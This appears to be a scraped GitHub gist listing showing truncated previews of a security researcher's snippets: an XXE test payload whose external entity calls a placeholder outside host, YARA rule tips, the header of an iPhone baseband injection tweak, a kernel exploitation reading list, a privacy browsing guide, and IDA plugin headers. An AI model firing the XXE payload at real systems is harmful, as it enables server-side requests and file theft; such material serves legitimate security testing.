| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
This Gist has been transfered into a Github Repo. You'll find the most recent version here.
When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.
| /* ultrasn0w (D) xerub 2014 | |
| * | |
| * This program is free software; you can redistribute it and/or modify | |
| * it under the terms of the "do What The Fuck you want to Public License"; | |
| * either version 1 of the License, or whatever (the fuck) version you want. | |
| * | |
| * $ ios-clang -o ultrasn0w.o -Wno-variadic-macros -O2 -c ultrasn0w.c | |
| * $ ios-clang -o ultrasn0w.dylib -shared ultrasn0w.o -lsubstrate -lATCommandStudioDynamic | |
| * | |
| * Inject into CommCenterClassic iPhone3,1 baseband 1.59.00 |
| #!/usr/bin/python | |
| ################# | |
| # NOTE | |
| # Now at https://github.com/jkominek/updatestars | |
| ################# | |
| import requests | |
| import json | |
| import re |
| Kreading klist: | |
| Attack the Core - http://www.amazon.com/Guide-Kernel-Exploitation-Attacking-Core/dp/1597494860 | |
| Kernel Exploitation Notes - http://phrack.org/issues/64/6.html#article | |
| Stack Jacking - https://jon.oberheide.org/blog/2011/04/20/stackjacking-your-way-to-grsec-pax-bypass/ | |
| Smashing the Kernel Stack for Fun and Profit- http://phrack.org/issues/60/6.html | |
| A XNU Hope - http://phrack.org/issues/64/11.html | |
| Core Security OpenBSD IPv6 Remote Kernel Exploit - http://www.coresecurity.com/content/open-bsd-advisorie | |
| 802.11 Wireless Vulnerabilities on Windows - http://www.uninformed.org/?v=6&a=2&t=sumry | |
| Abusing Mach on OS X - http://www.uninformed.org/?v=4&a=3&t=sumry |
The purpose of this document is to make recommendations on how to browse in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.
I welcome contributions and comments on the information contained. Please see the How to Contribute section for information on contributing your own knowledge.
| # AArch64 mov simplifier IDA plugin | |
| # | |
| # Copyright (c) 2015 xerub | |
| # | |
| # This program is free software; you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation; either version 2 of the License, or | |
| # (at your option) any later version. | |
| # | |
| # This program is distributed in the hope that it will be useful, |
| package main | |
| import ( | |
| "encoding/hex" | |
| "fmt" | |
| uc "github.com/unicorn-engine/unicorn/bindings/go/unicorn" | |
| "strings" | |
| ) | |
| var asm = strings.Join([]string{ |
| # Fix clang function prologues | |
| # WARNING: this WILL patch bytes in the database | |
| # | |
| # Copyright (c) 2015 xerub | |
| # | |
| # This program is free software; you can redistribute it and/or modify | |
| # it under the terms of the GNU General Public License as published by | |
| # the Free Software Foundation; either version 2 of the License, or | |
| # (at your option) any later version. | |
| # |
